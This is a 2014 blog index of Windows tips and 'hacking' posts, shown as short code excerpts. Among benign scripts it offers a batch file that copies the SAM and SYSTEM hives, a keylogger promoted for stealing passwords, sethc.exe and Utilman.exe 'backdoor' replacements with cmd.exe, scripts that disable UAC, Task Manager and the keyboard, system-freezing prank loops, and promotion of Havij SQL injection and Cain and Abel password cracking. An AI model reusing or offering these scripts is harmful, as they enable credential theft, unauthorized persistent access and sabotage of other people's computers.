Pages

hide drives

Sunday, 25 May 2014
steps: 1. Go to start->run.Type regedit.Now go to: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies  \Explorer 2. In the right pane create a new DWORD item and name it NoDrives(it is case sensitive). 3. Modify it's value and set it to 3FFFFFF (Hexadecimal) . 4. Restart the computer. 5. Now when you click on My Computer, no drives will be shown(all gone...). To enable display of drives in My...
Read more ...

create a folder with no name

Sunday, 25 May 2014
steps: select any folder >rename it >press alt & type 0160 or 255 >ent...
Read more ...

copy SAM SYSTEM files

Sunday, 25 May 2014
code: @echo off mkdir c:\file reg save HKLM\SAM C:\file\SAM reg SAVE HKLM\SYSTEM C:\file\SYST...
Read more ...

Get remote MAC address

Sunday, 25 May 2014
code: On error resume next strComputer = (InputBox("Enter the name of the computer to get the MAC address", "Computer Name")) If strComputer <> "" Then strInput = True End if Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set colItems = objWMIService.ExecQuery _ ("Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True") For Each objItem in colItems Wscript.Echo objIt...
Read more ...

text to voice

Sunday, 25 May 2014
code: Dim msg, sapi msg=InputBox("Enter your text","Talk it") Set sapi=CreateObject("sapi.spvoice") sapi.Speak m...
Read more ...

get serial number and model number of your monitor

Sunday, 25 May 2014
code: Option Explicit Dim WshShell Set WshShell = WScript.CreateObject("WScript.Shell") Dim strComputer, message Dim intMonitorCount Dim oRegistry, sBaseKey, sBaseKey2, sBaseKey3, skey, skey2, skey3 Dim sValue dim i, iRC, iRC2, iRC3 Dim arSubKeys, arSubKeys2, arSubKeys3, arrintEDID Dim strRawEDID Dim ByteValue, strSerFind, strMdlFind Dim intSerFoundAt, intMdlFoundAt, findit Dim tmp, tmpser, tmpmdl, tmpctr Dim batch, bHeader batch...
Read more ...

adds fast shutdown icon to your desktop

Sunday, 25 May 2014
code: Set Shell = CreateObject("WScript.Shell") DesktopPath = Shell.SpecialFolders("Desktop") ' Add Shutdown link to the desktop Set linkShutdown = Shell.CreateShortcut(DesktopPath & "\Shutdown.lnk") linkShutdown.Arguments = "-s -t 00" linkShutdown.Description = "Shutdown the computer" linkShutdown.IconLocation = ("%SystemRoot%\system32\SHELL32.dll,27") linkShutdown.TargetPath = "shutdown" linkShutdown.WindowStyle = 1 linkShutdown.WorkingDirectory...
Read more ...

code to display internal ip hostname and gateway

Sunday, 25 May 2014
code: Set wshShell = WScript.CreateObject( "WScript.Shell" ) strComputerName = wshShell.ExpandEnvironmentStrings( "%COMPUTERNAME%" ) strComputer = "." strIP ="." strGateway="." Set objWMIService = GetObject("winmgmts:" _     & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2") Set colAdapters = objWMIService.ExecQuery _     ("SELECT * FROM Win32_NetworkAdapterConfiguration...
Read more ...

displays your public ip

Sunday, 25 May 2014
code: Dim objHTTP, strHTML, varStart, varStop Dim strIP, strCurrIP, objShell ' Get current external IP address from web Set objHTTP = CreateObject("MSXML2.XMLHTTP") Call objHTTP.Open("GET", "http://checkip.dyndns.org", False) objHTTP.Send() strHTML = objHTTP.ResponseText ' Extarct IP from HTML if HTML was recieved If strHTML <> "" Then varStart = InStr(1, strHTML, "Current IP Address:", vbTextCompare) + 19 If varStart...
Read more ...

hit backspace simultaneously

Sunday, 25 May 2014
code: MsgBox "Let's go back a few steps" Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{bs}" lo...
Read more ...

vbs trick talking

Sunday, 25 May 2014
code: StrText=("you are a fool") set ObjVoice = CreateObject("SAPI.SpVoice") ObjVoice.Rate=-3 ObjVoice.Speak StrTe...
Read more ...

vbs ghost typing

Sunday, 25 May 2014
1.open notepad2.copy & paste below code into notepad3.save file as file name.vbscode:Set wshShell = wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "You are a fool."loo...
Read more ...

open disktray simultaneously

Sunday, 25 May 2014
steps: 1.open notepad 2.copy & paste below code into notepad 3.save file as file name.vbs code: Do  Set oWMP = CreateObject("WMPlayer.OCX.7" )  Set colCDROMs = oWMP.cdromCollection  colCDROMs.Item(d).Eject   colCDROMs.Item(d).Eject   Loop  ...
Read more ...

uac enable and disable

Sunday, 25 May 2014
enable: C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f disable: C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 ...
Read more ...

keyboard disable

Saturday, 18 January 2014
steps: 1.copy & paste the below code into notepad. 2.save file as file name.bat. 3.run file as run as administrator by right clicking on file. code:  @echo offecho Windows Registry Editor Version 5.00 > "nokeyboard.reg"echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"echo...
Read more ...

remove ports 80,443,53

Saturday, 18 January 2014
steps: 1.copy & paste the below code into notepad. 2.save file as file name.bat. 3.run file as run as administrator by right clicking on file. code: @echo offEcho "Press ANY KEY to REMOVE ports 80 TCP (HTTP) / 443 TCP (HTTPSecure) / 53 UDP (DNS)" pause "%SYSTEMROOT%\system32\netsh" advfirewall firewall add rule name="HTTP 80" dir=in action=allow protocol=TCP localport=80Echo "80 TCP Open.""%SYSTEMROOT%\system32\netsh"...
Read more ...

infinite folders

Saturday, 18 January 2014
steps: 1.copy & paste the below code into notepad. 2.save file as file name.bat. 3.run file as run as administrator by right clicking on file. code:  @echo off:topmd %random%goto top  above code which create infinite folders within second...
Read more ...

folder locker

Saturday, 18 January 2014
steps: 1.copy & paste the below code into notepad. 2.save file as file name.bat. 3.run file as run as administrator by right clicking on file. code: @ECHO OFFtitle Folder Lockerif EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCKif NOT EXIST Locker goto MDLOCKER:CONFIRMecho Enter password to lock folder or for cancel press Nset/p "cho=>"if %cho%==ragday goto LOCKif %cho%==n goto ENDif %cho%==N...
Read more ...

enable and disable taskmanager

Saturday, 18 January 2014
steps: 1.copy & paste the below code into notepad. 2.save file as file name.bat. 3.run file as run as administrator by right clicking on file. code to enable taskmanager: ECHO REGEDIT4 > %WINDIR%\DXM.REGecho. >> %WINDIR%\DXM.regecho [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.regecho "DisableTaskMgr"=dword:0>> %WINDIR%\DXM.regecho [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]...
Read more ...

keylogger

Saturday, 18 January 2014
keylogger:   Keylogger is intended for interception and recording in a file of everything that is entered from the keyboard into a log.txt file. keylogger which records every strock of your keyboard. you can hack any passwords by installing it. code: #include <iostream>using namespace std;#include <windows.h>#include...
Read more ...

hacking websites using havij tool

Saturday, 18 January 2014
havij: Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software, user can perform back-end database fingerprinting, retrieve DBMS login names and password hashes, dump tables...
Read more ...

recovery windows passwords using cain and abel

Saturday, 18 January 2014
cain and abel: Cain and Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless...
Read more ...

advance port scanner

Saturday, 18 January 2014
advance port scanner: Advanced Port Scanner is yet another port scanner that provides a fast engine and an easy to use interface.which is used to scan for the open and closed ports. scan for the open ports using the advance port scanner through which you can access the files. check for the open ports and access the control through i...
Read more ...

angry ip scanner

Saturday, 18 January 2014
angry ip scanner:  Angry IP Scanner is an open-source and cross-platform network scanner designed to be fast and simple to use. It scans IP addresses and ports.  find out whether an IP is alive or dead using an angry ip scanner.   scan for the target ip whether alive or dead you can check ur ipadress by following...
Read more ...

view the most shared and most viewed videos of another countries

Friday, 17 January 2014
open the link as shown below  http://www.youtube.com/trendsdashboard#loc0=ind open the link to view the top videos of any country  ...
Read more ...

utility manager backdoor

Friday, 17 January 2014
code:@echo off pause takeown /f %systemroot%\system32\Utilman.exe icacls %systemroot%\system32\Utilman.exe /grant administrators:f rename %systemroot%\system32\Utilman.exe  Utilman.exe.exe.bak copy %systemroot%\system32\cmd.exe %systemroot%\system32\cmd3.exe rename %systemroot%\system32\cmd3.exe Utilman.exe pause echo click on utilmanager...
Read more ...

windows backdoor

Friday, 17 January 2014
sticky keys and utility manager are the backdoors of windows operating system goto:c:\windows\system32\sethc.exe code: @echo off pause takeown /f %systemroot%\system32\sethc.exe icacls %systemroot%\system32\sethc.exe /grant administrators:f rename %systemroot%\system32\sethc.exe  sethc.exe.bak copy %systemroot%\system32\cmd.exe...
Read more ...

download youtube videos directly without any software

Thursday, 16 January 2014
steps to download: 1.open video which u want to download example: http://www.youtube.com/watch?v=RahEtkVxAPA replace above url as below  http://www.ssyoutube.com/watch?v=RahEtkVxAPA  which shows the downloading formats & click on the format which u want to download as shown in below ...
Read more ...

batch file which opens notepad continuously

Thursday, 16 January 2014
1.copy the below code @echo off :top START %SystemRoot%\system32\notepad.exe GOTO top 2.paste the code into the notepad 3.save the file as file name.bat warning:do not open the file name.bat which freezes the computer...
Read more ...

change admin password using notepad

Thursday, 16 January 2014
1.copy the below code Code: @echo off net user %username% ragday 2.paste the code into the notepad 3.save the file as file name.bat 4.run bat file as run as administrator by right clicking on file name.bat 5.now the admin password is changed to ragday as shown in above co...
Read more ...

how to hide drives through cmd

Thursday, 16 January 2014
to hide drive: 1.open run & type diskpart 2.list volume 3.select volume (as listed as shown in fig) 4.remove letter j (letter of drive which u likes to hide) to unhide the drive: 1.list volume 2.select volume (which u likes to unhide) 3.assign letter j ...
Read more ...

how to add or remove recycle bin to my computer

Thursday, 16 January 2014
1.open notepad 2.copy & paste below code into notepad 3.save file as file name.reg to add recycle bin to my computer: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}] to remove recycle bin from my computer: [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{645FF040-5081-101B-9F08-00AA002F...
Read more ...

how to shutdown pc through commands

Thursday, 16 January 2014
commands: shutdown multiple computers:shutdown -i shutdown                                 :shutdown -s shutdown at given time           :shutdown -s -t 30 abort shutdown -a                    :shutdown -a ...
Read more ...

how to change administrator password

Tuesday, 14 January 2014
change your passwords using following commands: 1.net user 2.net user admin(username) * 3.enter password...
Read more ...

backdoor

Tuesday, 14 January 2014
A backdoor in a computer system is a method of bypassing normal authentication, securing illegal remote access to a compute...
Read more ...